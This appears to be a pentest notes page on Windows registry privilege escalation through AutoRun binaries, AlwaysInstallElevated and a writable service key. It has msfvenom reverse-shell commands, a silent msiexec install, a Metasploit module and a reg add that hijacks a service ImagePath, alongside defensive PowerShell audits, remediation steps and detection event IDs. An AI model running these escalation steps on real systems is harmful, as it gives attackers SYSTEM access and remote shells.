coffeetohack
Registry

AUTORUN:

Your enumeration scripts list the AutoRun programs (winPEAS shows them under "AutoRun applications"). Check whether you have read/write access to those program files. If you do, create a malicious executable with the AutoRun program's name and replace the original one. This requires a restart of the machine before the AutoRun gives you a shell, so you only get a shell when the Administrator logs into their account: the administrator receives a prompt to run the program, and once they accept it, you get a reverse shell.

ALWAYS INSTALL ELEVATED:

Windows installs software from .msi packages (Windows Installer packages). When the AlwaysInstallElevated policy is on, msiexec installs any package with SYSTEM privileges, regardless of who runs it. For the exploit to work, the setting must be enabled in both of the following registry keys:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Check both keys and confirm that AlwaysInstallElevated is set to 1 in each; the policy only takes effect when both the machine and the user value are 1.
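The following PowerShell is an added hardening check, not code from the original page: it reads the same two values the reg query commands above show and reports whether the policy is actually in force, which requires both values to be 1. The function name and the output fields are my own.

```powershell
# Added audit example (not from the original page): reports whether the
# AlwaysInstallElevated policy is effective on this host. Windows Installer
# only honours it when BOTH the machine (HKLM) and the user (HKCU) value are 1.
function Get-AlwaysInstallElevatedStatus {
    $paths = @{
        Machine = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    }
    $values = @{}
    foreach ($scope in 'Machine', 'User') {
        $value = $null
        if (Test-Path $paths[$scope]) {
            # A missing value yields $null (the error is suppressed), which we
            # report as "not set" rather than as 0.
            $value = (Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $values[$scope] = $value
    }
    [pscustomobject]@{
        MachineValue = $values.Machine
        UserValue    = $values.User
        # Effective only when both are 1; a single 1 is harmless on its own.
        Effective    = (($values.Machine -eq 1) -and ($values.User -eq 1))
    }
}

$status = Get-AlwaysInstallElevatedStatus
$status | Format-List
if ($status.Effective) {
    Write-Warning ('AlwaysInstallElevated is in force: any user can install an MSI as SYSTEM. ' +
        'Disable it in Group Policy under Computer Configuration and User Configuration > ' +
        'Administrative Templates > Windows Components > Windows Installer > ' +
        '"Always install with elevated privileges", or set both values to 0.')
}
```

Run it in the context of an ordinary (non-admin) user, since the HKCU half is per user. For remediation outside Group Policy, setting both values to 0 (or deleting them) with reg add or Set-ItemProperty closes the hole; to spot abuse after the fact, MsiInstaller events in the Application log (for example 1033 and 11707) record each installation, so an install of an unknown package initiated by a low-privilege account on a host where this policy was enabled is worth investigating.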

METHOD 1:

Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task

METHOD 2:

Create a Metasploit reverse shell packaged as an MSI, transfer it to the machine and run it with msiexec.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to the victim machine (here C:\Temp\shell.msi) and run:
msiexec /quiet /qn /i C:\Temp\shell.msi

METHOD 3:

#Get a meterpreter shell
#Background the session: background
#Use exploit
use exploit/windows/local/always_install_elevated
#Then set the SESSION that was in background

REGSVC:

winPEAS: Looking if you can modify any service registry

#Suppose that winPEAS reports the service registry key:
HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership])

#Verify the permissions of the service key:
#CMD (accesschk takes the key in HKLM\... form, not the PowerShell HKLM:\ drive form)
accesschk /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

#POWERSHELL
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

#Check if we can start the service (replace "user" with your username)
accesschk /accepteula -ucqv user regsvc

#Query the service info (reg.exe also takes the HKLM\... form)
reg query HKLM\System\CurrentControlSet\Services\regsvc

#Create a reverse shell and transfer it to C:\Temp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe

#Point the service's ImagePath at the transferred executable
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

#Start a listener on LPORT, then start the service
sc start regsvc
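The audit below is an added example, not code from the original page, and covers both the AUTORUN and the REGSVC sections from the defender's side: it finds Run/RunOnce entries whose target executable is writable by a low-privilege principal, and service keys under HKLM\SYSTEM\CurrentControlSet\Services on which such a principal can set values (ImagePath included) or take ownership, which is the same condition winPEAS and accesschk flag above. The principal list, the rights pattern and all function names are my own assumptions; run it in an elevated session so every key and file can be read.

```powershell
# Added audit example (not from the original page). Reports AutoRun targets and
# service registry keys that low-privilege principals can modify or take over.
# Assumptions: elevated PowerShell; the principal list below is a starting point.

$LowPrivPrincipals = @(
    'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE', 'NT AUTHORITY\ANONYMOUS LOGON'
)

# Named rights that let a principal change or take over a file or key.
$WriteRightsPattern = 'FullControl|Modify|Write|TakeOwnership|ChangePermissions|SetValue|CreateSubKey|Delete'

function Test-WriteRight {
    # $Rights is a FileSystemRights or RegistryRights enum value (or $null).
    param($Rights)
    if ($null -eq $Rights) { return $false }
    if ("$Rights" -match $WriteRightsPattern) { return $true }
    # Generic rights (GENERIC_ALL 0x10000000, GENERIC_WRITE 0x40000000) have no
    # enum name and print as raw numbers; treat them as write access as well.
    return (([int64]$Rights -band 0x50000000) -ne 0)
}

function Get-WeakAces {
    # Allow ACEs granting write-type rights to a low-privilege principal.
    param([System.Security.AccessControl.ObjectSecurity]$Acl)
    $Acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value) -and
        ((Test-WriteRight $_.FileSystemRights) -or (Test-WriteRight $_.RegistryRights))
    }
}

function Get-WritableAutoRunTargets {
    $runKeys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($providerProps -contains $prop.Name) { continue }
            $command = [string]$prop.Value
            # A quoted path is taken verbatim; for an unquoted command line try
            # each space-separated prefix until one names an existing file, which
            # also resolves unquoted paths that contain spaces.
            if ($command -match '^"([^"]+)"') {
                $candidates = @($Matches[1])
            } else {
                $parts = $command -split ' '
                $candidates = 1..$parts.Count | ForEach-Object { $parts[0..($_ - 1)] -join ' ' }
            }
            $exe = $candidates |
                ForEach-Object { [Environment]::ExpandEnvironmentVariables($_) } |
                Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Leaf) } |
                Select-Object -First 1
            if (-not $exe) { continue }
            foreach ($ace in (Get-WeakAces -Acl (Get-Acl -LiteralPath $exe))) {
                [pscustomobject]@{
                    Kind      = 'AutoRun'
                    Object    = "$key\$($prop.Name) -> $exe"
                    Principal = $ace.IdentityReference.Value
                    Rights    = "$($ace.FileSystemRights)"
                }
            }
        }
    }
}

function Get-WeakServiceKeys {
    $servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in (Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue)) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in (Get-WeakAces -Acl $acl)) {
            [pscustomobject]@{
                Kind      = 'ServiceKey'
                Object    = $key.Name
                Principal = $ace.IdentityReference.Value
                Rights    = "$($ace.RegistryRights)"
            }
        }
    }
}

$findings = @(Get-WritableAutoRunTargets) + @(Get-WeakServiceKeys)
if ($findings.Count -eq 0) {
    'No AutoRun targets or service keys writable by low-privilege principals.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Each finding names the object, the principal and the offending rights, which is what you need to remove the ACE (icacls for the file, Set-Acl or regedit for the key) or to move the AutoRun binary into a directory only administrators can write. A service whose ImagePath is changed outside of a software install is a strong detection signal on its own: with object-access auditing and a SACL on the Services key it appears as Security event 4657 (registry value modified), and Sysmon records it as event 13 (RegistryEvent, value set).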


Last updated 4 years ago